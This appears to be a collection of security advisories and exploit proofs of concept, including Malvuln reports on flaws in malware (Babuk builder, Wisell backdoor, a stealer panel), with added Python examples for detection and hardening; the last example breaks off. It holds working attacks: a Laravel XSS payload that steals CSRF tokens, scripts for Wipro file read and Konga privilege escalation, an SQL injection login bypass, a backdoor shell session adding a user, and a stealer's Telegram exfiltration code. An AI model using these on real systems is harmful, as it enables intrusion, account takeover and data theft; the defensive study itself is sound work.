<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/5dfa998f62612e10d5d28d26948dd50f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransomware Builder Babuk<br />Vulnerability: Insecure Permissions<br />Description: The malware creates directories with insecure permissions when writing to the C:\ drive, granting change (C) permissions to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable and then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: 5dfa998f62612e10d5d28d26948dd50f<br />Vuln ID: MVID-2022-0461<br />Disclosure: 01/19/2022<br /><br /><br />Exploit/PoC:<br />C:\>builder.exe<br />Usage: builder.exe FolderName<br /><br />C:\>builder.exe c:\hate<br />Creating folder 'c:\hate'<br />curve25519 keys generated.<br />"c:\hate\e_win.exe" written!<br />"c:\hate\d_win.exe" written!<br />"c:\hate\e_esxi.out" written!<br />"c:\hate\d_esxi.out" written!<br />"c:\hate\e_nas_x86.out" written!<br />"c:\hate\d_nas_x86.out" written!<br />"c:\hate\e_nas_arm.out" written!<br />"c:\hate\d_nas_arm.out" written!<br />"c:\hate\kp.curve25519" written!<br />"c:\hate\ks.curve25519" written!<br />Press any key to continue . . .<br /><br />C:\>cacls \hate<br />C:\hate BUILTIN\Administrators:(OI)(CI)(ID)F<br /> NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F<br /> BUILTIN\Users:(OI)(CI)(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /> NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre style="position: relative;">
<code># Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://laravel.com/
# Software Link: https://laravel.com/docs/4.2
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux
# Description: We can bypass Laravel's image file upload validation to upload arbitrary files to the web server,
# which lets us run arbitrary JavaScript in the application's origin and bypass the CSRF token. For more information read https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b
# Steps to reproduce:
1- Use the HxD hex editor to add the JPEG magic bytes FF D8 FF E0 at the very beginning of your file
2- Use the code below to bypass the CSRF token
ÿØÿà<html>
<head>
<title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
// Target of the forged POST; edit this to the form action you want to submit
var POST_URL = "/";

function submitFormWithTokenJS(token) {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", POST_URL, true);
  // Send the proper header information along with the request
  xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  // This is for debugging and can be removed
  xhr.onreadystatechange = function() {
    if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
      console.log(xhr.responseText);
    }
  };
  // The stolen _token is sent along with whatever parameters the target form expects
  xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}

function getTokenJS() {
  var xhr = new XMLHttpRequest();
  // This tells it to return the response as an HTML document
  xhr.responseType = "document";
  // true on the end of here makes the call asynchronous
  // Edit the path as you want: any same-origin page that renders the CSRF hidden input works
  xhr.open("GET", "/image-upload", true);
  xhr.onload = function (e) {
    if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
      // Get the document from the response
      var page = xhr.response;
      // Get the input element (assumes the hidden _token field is the first input on the page)
      var input = page.getElementsByTagName("input")[0];
      // Show the token
      alert("The token is: " + input.value);
      // Use the token to submit the form
      submitFormWithTokenJS(input.value);
    }
  };
  // Make the request
  xhr.send(null);
}

getTokenJS();
</script>
</body>
</html>
3- Save it as an HTML file and upload it.
</code></pre>
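The bypass in step 1 works because the upload check classifies the file by its leading bytes: anything that starts with the JPEG signature FF D8 FF E0 is accepted as an image, whatever follows. The block below is an added example in Python, not code from the advisory or from Laravel. It shows a signature-only check accepting the HTML/JPEG polyglot, then a simplified JPEG segment walk plus a markup scan rejecting it, including the variant where an attacker appends an EOI marker to look more like a real file. Both sample files are constructed inline.

```python
"""Added example: why a magic-byte check accepts an HTML/JPEG polyglot, and a
structural JPEG walk that rejects it. Sample files are constructed, not real uploads."""
import re

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
# Markup that has no business inside an image; catches HTML hidden in COM/APPn segments too.
HTML_MARKUP = re.compile(rb"<\s*/?(?:html|script|body|iframe|svg|img)\b", re.IGNORECASE)


def magic_says_jpeg(data: bytes) -> bool:
    """Signature-only check: looks at the first bytes and nothing else."""
    return data[:3] == b"\xff\xd8\xff"


def walk_jpeg_segments(data: bytes) -> bool:
    """Simplified structural check: SOI first, EOI last, and every marker segment
    between SOI and SOS must carry a length field that stays inside the file."""
    if not data.startswith(JPEG_SOI) or not data.endswith(JPEG_EOI):
        return False
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return False                 # expected a marker, found payload bytes
        marker = data[pos + 1]
        if marker in (0xDA, 0xD9):       # SOS (scan follows) or an early EOI
            return True
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        if length < 2 or pos + 2 + length > len(data):
            return False                 # length field overruns the file
        pos += 2 + length
    return False


def contains_html_markup(data: bytes) -> bool:
    return HTML_MARKUP.search(data) is not None


def accept_upload(data: bytes) -> bool:
    """Hardened decision: structure must walk cleanly and no markup may appear anywhere."""
    return walk_jpeg_segments(data) and not contains_html_markup(data)


# Constructed inputs:
# 1. The polyglot from step 1: SOI + APP0 marker glued in front of an HTML document.
POLYGLOT = b"\xff\xd8\xff\xe0" + b"<html><body><script>alert(1)</script></body></html>"
# 2. A minimal structurally valid JPEG: SOI, APP0 (JFIF), SOS, two scan bytes, EOI.
#    Not a decodable picture, just enough for the segment walk.
MINIMAL_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x00\x00"
    + b"\xff\xd9"
)

if __name__ == "__main__":
    for name, blob in (("polyglot", POLYGLOT), ("polyglot+EOI", POLYGLOT + JPEG_EOI), ("minimal_jpeg", MINIMAL_JPEG)):
        print(f"{name:13s} magic={magic_says_jpeg(blob)} "
              f"structural={walk_jpeg_segments(blob)} accept={accept_upload(blob)}")
```

The polyglot fails the walk because the two bytes after the APP0 marker (`<h`) are read as a segment length of 15464, far past the end of the file. Content checks like this reduce the attack surface but do not remove it: the root cause is that an uploaded file is served from the application's own origin and rendered by the browser. Storing uploads on a separate origin, or serving them with a fixed Content-Type, `X-Content-Type-Options: nosniff` and `Content-Disposition: attachment`, is what actually stops the uploaded HTML from executing with the victim's session.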
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/57bda78cc5fd6a06017148bae28e8e39.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wisell<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 5277 and hands any connecting client a command shell without authentication. Third-party attackers who can reach an infected system can run arbitrary OS commands, further compromising the host.<br />Type: PE32<br />MD5: 57bda78cc5fd6a06017148bae28e8e39<br />Vuln ID: MVID-2022-0460<br />Disclosure: 01/19/2022<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 5277<br />WinShell v1.0 - '!' to quit, 'enter' to shell...<br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\dump>whoami<br />whoami<br />desktop-2c3iqho\victim<br /><br />C:\dump>net user HYP3RLINX 666 /add<br />net user HYP3RLINX 666 /add<br />The command completed successfully.<br /></code></pre>
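The nc session above shows the listener volunteering its "WinShell v1.0" greeting the moment a client connects, which is enough to find infected hosts from the network without sending a single command. The following is an added example in Python, not part of the Malvuln advisory: a banner probe that flags that greeting, exercised against a constructed loopback stand-in for the listener so it runs without an infected machine. The port number and banner text are the advisory's; the sweep helper and the fake listener are assumptions for illustration.

```python
"""Added example (not from the advisory): banner probe for the Wisell listener,
checked against a constructed local stand-in so it runs without an infected host."""
import socket
import threading

WISELL_PORT = 5277
# Greeting exactly as the advisory's nc session shows it.
WISELL_BANNER = b"WinShell v1.0 - '!' to quit, 'enter' to shell..."


def probe_banner(host, port, timeout=3.0):
    """Connect and read whatever the service volunteers. The Wisell shell greets on
    connect, so nothing is sent. Returns b'' if closed, silent or unreachable."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            return s.recv(512)
    except OSError:
        return b""


def is_wisell_shell(banner):
    """Match on the fixed prefix; the version string may vary between builds."""
    return banner.startswith(b"WinShell v1.0")


def sweep(hosts, port=WISELL_PORT):
    """Return the subset of hosts whose port greets like the Wisell shell."""
    return [h for h in hosts if is_wisell_shell(probe_banner(h, port))]


def start_fake_listener(banner):
    """Constructed stand-in for an infected host on an ephemeral loopback port:
    accepts one client, sends the banner, closes. Returns (port, thread)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
        srv.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return port, t


if __name__ == "__main__":
    port, t = start_fake_listener(WISELL_BANNER)
    print("hosts greeting like Wisell:", sweep(["127.0.0.1"], port))
    t.join(2)
```

On a real network the same probe is run against port 5277 across the address range; a host that answers with this banner is compromised, and the immediate containment step is to block the port at the segment boundary, since the advisory's PoC shows the shell will create local accounts for anyone who connects.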
<pre><code># Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Read PoC<br /># Date: 05/08/2021<br /># Exploit Author: Rizal Muhammed @ub3rsick<br /># Vendor Homepage: https://www.wipro.com/holmes/<br /># Version: 20.4.1<br /># Tested on: Windows 10 x64<br /># CVE : CVE-2021-38146<br /><br />import requests as rq<br />import argparse<br /><br />port = 8001 # change port if the application is running on a different port<br /><br />def file_download(host, filepath):<br />    # The unauthenticated /home/download endpoint returns the file named in SearchString<br />    vuln_url = "http://%s:%s/home/download" % (host, port)<br />    data = {<br />        "SearchString": filepath,<br />        "Msg": ""<br />    }<br /><br />    hdr = {<br />        "content-type": "application/json"<br />    }<br /><br />    resp = rq.post(vuln_url, headers=hdr, json=data)<br /><br />    print(resp.text)<br /><br />def main():<br />    parser = argparse.ArgumentParser(<br />        description="CVE-2021-38146 - Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Download",<br />        epilog="Vulnerability Discovery and PoC Author - Rizal Muhammed @ub3rsick"<br />    )<br />    parser.add_argument("-t", "--target-ip", help="IP Address of the target server", required=True)<br />    parser.add_argument("-f", "--file-path", help="Absolute Path of the file to download", default="C:/Windows/Win.ini")<br />    args = parser.parse_args()<br /><br />    # Normalise Windows separators to the forward-slash form the endpoint accepts<br />    fp = args.file_path.replace("\\", "/")<br />    file_download(args.target_ip, fp)<br /><br />if __name__ == "__main__":<br />    main()<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/54530f88c8e4f4371c9418f00c256b1d_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: CollectorStealerBuilder v2.0.0 Panel<br />Vulnerability: Man-in-the-Middle (MITM)<br />Description: A MITM vector exists because the cURL request used to send stolen data to "api.telegram.org/bot" sets CURLOPT_SSL_VERIFYPEER to false. CURLOPT_SSL_VERIFYPEER controls whether cURL checks that the remote certificate is valid and was issued by a CA you trust; with it disabled, anyone on the network path can present their own certificate for api.telegram.org and read or alter the exfiltrated files, the caption, and the bot token that is embedded in the request URL.<br />Type: WebUI<br />MD5: 54530f88c8e4f4371c9418f00c256b1d<br />MD5: 8c003105229554557c75ec836b4fcf79 (collect.php)<br />Vuln ID: MVID-2022-0459<br />Disclosure: 01/19/2022<br /><br />Exploit/PoC:<br />Vulnerable "collect.php" code snippet.<br /><br />$desc = "_________________________ \r\n\n🏴 IP: " . $ip . "\n🌐 Country: " . $country . "\n🏠 City: " . $city . "\n🔧 Build: ". $Build[1] . "\r\n_________________________ \n\n" . $desc; // Add the IP and city<br />$url = "https://api.telegram.org/bot" . $token . "/sendDocument";<br />$document = new CURLFile(realpath($dest_path));<br />$ch = curl_init();<br />curl_setopt($ch, CURLOPT_URL, $url);<br />curl_setopt($ch, CURLOPT_POST, 1);<br />curl_setopt($ch, CURLOPT_POSTFIELDS, ["chat_id" => $chat_id, "document" => $document, "caption" => $desc]);<br />curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type:multipart/form-data"]);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />$out = curl_exec($ch);<br />curl_close($ch);<br /></code></pre>
<pre><code># Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass<br /># Exploit Author: Daniel Haro (Dirox)<br /># Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html<br /># Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html<br /># Version: Simple Subscription Website 1.0<br /># Tested on: Windows, xampp<br /># CVE: CVE-2021-43140<br /><br />- Description:<br />A SQL injection vulnerability exists in the admin login action (Actions.php?a=login) of Sourcecodester Simple Subscription Website 1.0. The username and password fields are placed into the login query unsanitised, so the payload admin' or 1=1-- - closes the string literal, forces the WHERE clause to be true and comments out the rest of the query, logging the attacker in as the administrator (account takeover).<br /><br />PoC:<br /><br />POST /plan_application/Actions.php?a=login HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 57<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/plan_application/admin/login.php<br />Cookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3<br /><br />username=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-<br /><br /></code></pre>
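The request above only works because both form fields are concatenated into the SQL text. The block below is an added example, not the application's code: it reproduces that login query pattern against an in-memory SQLite database (the product is listed as a PHP and SQLite application, so the same dialect applies) and runs the advisory's payload through it, next to the parameterised form that treats the payload as an ordinary, non-matching username. The table layout, column names and the fixture row are assumptions for illustration.

```python
"""Added example (not the application's code): the concatenated login query that
the advisory's payload defeats, beside the parameterised version, run on SQLite."""
import sqlite3

# The payload from the advisory, as it arrives after URL decoding.
PAYLOAD = "admin' or 1=1-- -"


def make_db() -> sqlite3.Connection:
    """Constructed fixture: one admin row with a password the attacker does not know."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret-not-admin')")
    con.commit()
    return con


def login_vulnerable(con, username: str, password: str):
    """String-built query: the quote in the payload closes the literal, `or 1=1` makes
    the WHERE clause true, and `-- -` turns the password comparison into a comment."""
    sql = ("SELECT id, username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return con.execute(sql).fetchone()


def login_safe(con, username: str, password: str):
    """Bound parameters: the payload is compared as a literal username and matches nothing."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", login_vulnerable(con, PAYLOAD, PAYLOAD))   # (1, 'admin')
    print("safe      :", login_safe(con, PAYLOAD, PAYLOAD))         # None
    print("safe, real creds:", login_safe(con, "admin", "s3cret-not-admin"))  # (1, 'admin')
```

Note that hashing the stored password would not help here: the injected `-- -` removes the password comparison from the query entirely, so the only fix is to stop the input from reaching the SQL parser as code, which is what the bound parameters do.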
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/54530f88c8e4f4371c9418f00c256b1d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: CollectorStealerBuilder v2.0.0 Panel<br />Vulnerability: Insecure Credential Storage<br />Description: The panel for the Collector Stealer malware stores its login credentials in plaintext in its MySQL database. Third-party attackers who gain access to the system can read the panel usernames and passwords directly, without having to crack them offline.<br />Type: WebUI<br />MD5: 54530f88c8e4f4371c9418f00c256b1d<br />MD5: 8c003105229554557c75ec836b4fcf79 (collect.php)<br />Vuln ID: MVID-2022-0458<br />Disclosure: 01/19/2022<br /><br />Exploit/PoC:<br />--<br />-- phpMyAdmin SQL Dump<br />-- version 4.9.7<br />-- https://www.phpmyadmin.net/<br />--<br />-- Host: localhost<br />-- Generation Time: Feb 22, 2021 at 19:56<br />-- Server version: 5.7.21-20-beget-5.7.21-20-1-log<br />-- PHP Version: 5.6.40<br /><br />SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";<br />SET AUTOCOMMIT = 0;<br />START TRANSACTION;<br />SET time_zone = "+00:00";<br /><br /><br />/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;<br />/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;<br />/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;<br />/*!40101 SET NAMES utf8mb4 */;<br /><br />--<br />-- Database: `jkrefsewer_1`<br />--<br /><br />-- --------------------------------------------------------<br /><br />--<br />-- Table structure for table `Information`<br />--<br />-- Creation: Feb 19, 2021 at 11:04<br />-- Last update: Feb 22, 2021 at 16:54<br />--<br /><br />DROP TABLE IF EXISTS `Information`;<br />CREATE TABLE `Information` (<br /> `Build` text NOT NULL,<br /> `hash` text,<br /> `Date` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00' ON UPDATE CURRENT_TIMESTAMP,<br /> `Country` text,<br /> `IP` text,<br /> `Cookies` int(11) DEFAULT NULL,<br /> `Passwords` int(11) DEFAULT NULL,<br /> `Cards` int(11) DEFAULT NULL,<br /> `Wallets` int(11) DEFAULT NULL,<br /> `Path` text<br />) ENGINE=InnoDB DEFAULT CHARSET=utf8;<br /><br />-- --------------------------------------------------------<br /><br />--<br />-- Table structure for table `users`<br />--<br />-- Creation: Feb 17, 2021 at 14:15<br />--<br /><br />DROP TABLE IF EXISTS `users`;<br />CREATE TABLE `users` (<br /> `id` int(11) NOT NULL,<br /> `username` varchar(45) COLLATE utf8_unicode_ci NOT NULL,<br /> `password` varchar(45) COLLATE utf8_unicode_ci NOT NULL<br />) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;<br /><br />--<br />-- Dumping data for table `users`<br />--<br /><br />INSERT INTO `users` (`id`, `username`, `password`) VALUES<br />(1, 'admin', 'admin');<br /><br />--<br />-- Indexes for dumped tables<br />--<br /><br />--<br />-- Indexes for table `users`<br />--<br />ALTER TABLE `users`<br /> ADD PRIMARY KEY (`id`);<br /><br />--<br />-- AUTO_INCREMENT for dumped tables<br />--<br /><br />--<br />-- AUTO_INCREMENT for table `users`<br />--<br />ALTER TABLE `users`<br /> MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;<br />COMMIT;<br /><br />/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;<br />/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;<br />/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)<br /># Date: 11/11/2021<br /># Exploit Author: Mohammed Aadhil Ashfaq<br /># Vendor Homepage: https://form2email.dwbooster.com/<br /># Version: 1.3.24<br /># Tested on: WordPress<br /><br />POC<br />1. Log in to the WordPress admin and click Contact Form to Email<br />http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail<br />2. Create a new form with the name <script>alert(1)</script><br />3. Click Publish<br />4. The XSS is triggered on the resulting page<br />http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687<br />5. Open a different browser, log in to WordPress, paste the URL from step 4 and press Enter. The XSS triggers again, which shows the payload is stored rather than reflected.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/ca294b2f778abc14fef6313b3cea7155.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: VulturiBuilder<br />Vulnerability: Insecure Permissions<br />Description: The malware writes an .EXE with insecure permissions under the C:\ drive, granting change (C) permissions to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable and then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: ca294b2f778abc14fef6313b3cea7155<br />Vuln ID: MVID-2022-0457<br />Disclosure: 01/19/2022<br /><br /><br />Exploit/PoC:<br />C:\>cacls hate.exe<br />C:\hate.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir hate.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />01/11/2022 07:25 PM 298,496 hate.exe<br /> 1 File(s) 298,496 bytes<br /> 0 Dir(s) 27,531,624,448 bytes free<br /></code></pre>
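The VulturiBuilder advisory above and the Babuk builder advisory at the top of the page report the same condition: a cacls listing in which `NT AUTHORITY\Authenticated Users` holds Change (C) on a dropped directory or executable, so any logged-on user can replace what a privileged user will later run. The block below is an added example in Python and is not part of either advisory: a parser for cacls-style output that flags entries granting write-capable rights (C, F or W) to low-privilege principals, run over both advisories' listings and a constructed hardened baseline. The principal list and the baseline path are assumptions for illustration; cacls "special access" entries are ignored by this parser.

```python
"""Added example (not part of the Malvuln advisories): parse cacls output and flag
ACEs that let ordinary users modify the object, the condition both advisories report."""
import re

# Principals that every interactive/authenticated user falls under.
LOW_PRIV_PRINCIPALS = {
    "NT AUTHORITY\\Authenticated Users",
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\INTERACTIVE",
}
# cacls simple rights that allow changing or replacing the object.
WRITE_RIGHTS = {"C", "F", "W"}

# principal:(flags...)RIGHT  -- the first line of a listing also carries the path,
# which is skipped because it never matches the DOMAIN\name:( shape.
ACE_RE = re.compile(
    r"(?P<who>Everyone|(?:NT AUTHORITY|NT SERVICE|BUILTIN|[A-Za-z0-9_.\-]+)\\[^:\\]+)"
    r":(?P<flags>(?:\([A-Z]+\))*)(?P<right>[A-Z]+)\s*$"
)


def parse_cacls(text: str) -> list:
    """Return [(principal, flags_tuple, right)] for every simple ACE in a listing."""
    aces = []
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if m:
            flags = tuple(re.findall(r"\(([A-Z]+)\)", m.group("flags")))
            aces.append((m.group("who"), flags, m.group("right")))
    return aces


def weak_aces(text: str) -> list:
    """ACEs where a low-privilege principal can write. Inherit-only (IO) entries do
    not apply to the object itself but do apply to files created inside a directory,
    which is exactly where a builder drops its executables, so they are kept."""
    return [a for a in parse_cacls(text)
            if a[0] in LOW_PRIV_PRINCIPALS and a[2] in WRITE_RIGHTS]


# Listings taken verbatim from the two advisories.
BABUK_LISTING = r"""C:\hate BUILTIN\Administrators:(OI)(CI)(ID)F
 NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
 BUILTIN\Users:(OI)(CI)(ID)R
 NT AUTHORITY\Authenticated Users:(ID)C
 NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
"""
VULTURI_LISTING = r"""C:\hate.exe BUILTIN\Administrators:(ID)F
 NT AUTHORITY\SYSTEM:(ID)F
 BUILTIN\Users:(ID)R
 NT AUTHORITY\Authenticated Users:(ID)C
"""
# Constructed baseline: what a binary under Program Files normally looks like.
SAFE_LISTING = r"""C:\Program Files\tool\tool.exe BUILTIN\Administrators:(ID)F
 NT AUTHORITY\SYSTEM:(ID)F
 BUILTIN\Users:(ID)R
"""

if __name__ == "__main__":
    for name, listing in (("babuk", BABUK_LISTING), ("vulturi", VULTURI_LISTING), ("safe", SAFE_LISTING)):
        for who, flags, right in weak_aces(listing):
            print(f"{name}: {who} has {right} {'(inherit-only)' if 'IO' in flags else ''}")
```

The (ID) flag on every flagged entry means the right was inherited, not set by the builder: the root of a stock Windows system drive grants Authenticated Users Modify on subfolders and files, so any dropper that creates its folder or executable directly under C:\ without writing an explicit DACL ends up world-writable for logged-on users. The same check applies to legitimate per-machine installs in non-standard paths; a writable executable that SYSTEM or an administrator later runs is a privilege-escalation path regardless of who dropped it.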
<pre><code># Exploit Title: KONGA 0.14.9 - Privilege Escalation<br /># Date: 10/11/2021<br /># Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec)<br /># Vendor Homepage: https://github.com/pantsel/konga<br /># Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip<br /># Version: 0.14.9<br /># Tested on: Linux - Ubuntu 20.04.3 LTS (focal)<br /><br /># A low-privileged Konga user can promote themselves to administrator by updating<br /># their own record through PUT /api/user/{id} with the "admin" field set.<br /><br />import requests<br /><br />urlkonga = "http://www.example.com:1337/" # change to your konga address<br />identifier = "usernormalkonga" # change user<br />password = "changeme" # change password<br /><br />headers = {<br />    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",<br />    "Content-Type": "application/json;charset=utf-8",<br />    "connection-id": "",<br />    "Origin": urlkonga,<br />    "Referer": urlkonga<br />}<br /><br /># Step 1: log in as the normal user to obtain a token and the user's id<br />url = urlkonga + "login"<br />data = {<br />    "identifier": identifier,<br />    "password": password<br />}<br /><br />response = requests.post(url, json=data)<br />json_object = response.json()<br />token = json_object["token"]<br />user_id = json_object["user"]["id"]<br />print("[+] Attack")<br />print("[+] Token " + token)<br />print("[+] Exploiting User ID " + str(user_id))<br /><br /># Step 2: update our own user record with admin set to true<br />url2 = urlkonga + "api/user/" + str(user_id)<br />data2 = {<br />    "admin": "true",<br />    "passports": {<br />        "password": password,<br />        "protocol": "local"<br />    },<br />    "password_confirmation": password,<br />    "token": token<br />}<br /><br />print("[+] Change Normal User to Admin")<br />response2 = requests.put(url2, headers=headers, json=data2)<br />if response2.ok:<br />    print("[+] Success")<br />else:<br />    print("[-] Failed: HTTP " + str(response2.status_code))<br /></code></pre>
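The PoC works because the user-update endpoint applies whatever fields the authenticated caller sends, `admin` included, to the caller's own record. The block below is an added example in Python and not Konga's code (Konga is a Node.js application): it models that blind merge over a constructed in-memory user table, beside an update handler that authorises the caller first and then copies only allowlisted fields, rejecting string-typed privilege flags like the `"true"` the PoC sends. The field names come from the PoC body; the users table, the allowlists and the handler signatures are assumptions for illustration.

```python
"""Added example (not Konga's code): the mass-assignment pattern the PoC exploits,
modelled over a constructed in-memory user table, beside a hardened handler."""
import copy

# Constructed fixture: an administrator and the normal user from the PoC.
USERS = {
    1: {"id": 1, "username": "root", "admin": True},
    2: {"id": 2, "username": "usernormalkonga", "admin": False},
}

# Body the PoC sends to PUT /api/user/<id>; field names are the PoC's own.
POC_BODY = {
    "admin": "true",
    "passports": {"password": "changeme", "protocol": "local"},
    "password_confirmation": "changeme",
    "token": "eyJhbGciOi.example.token",
}

SELF_EDITABLE = {"username", "passports", "password_confirmation"}  # on your own record
ADMIN_ONLY = {"admin"}                                               # administrators only


class Forbidden(Exception):
    pass


def fresh_users():
    """Independent copy of the fixture so each scenario starts clean."""
    return copy.deepcopy(USERS)


def update_user_vulnerable(users, actor_id, target_id, body):
    """What the PoC relies on: any authenticated caller, every field merged as sent."""
    record = users[target_id]
    record.update(body)
    return record


def update_user_hardened(users, actor_id, target_id, body):
    """Authorise, then copy only allowlisted fields. Returns (record, dropped_fields)."""
    actor = users[actor_id]
    if target_id != actor_id and not actor["admin"]:
        raise Forbidden("non-admins may only edit their own record")
    allowed = SELF_EDITABLE | (ADMIN_ONLY if actor["admin"] else set())
    dropped = sorted(k for k in body if k not in allowed)
    clean = {k: v for k, v in body.items() if k in allowed}
    # Privilege flags must be real booleans, never the string "true" the PoC sends.
    if "admin" in clean and not isinstance(clean["admin"], bool):
        raise ValueError("admin must be a JSON boolean")
    record = users[target_id]
    record.update(clean)
    return record, dropped


def is_admin(users, user_id):
    """Truthiness check, as a naive authorisation layer would evaluate the flag."""
    return bool(users[user_id]["admin"])


if __name__ == "__main__":
    vulnerable = fresh_users()
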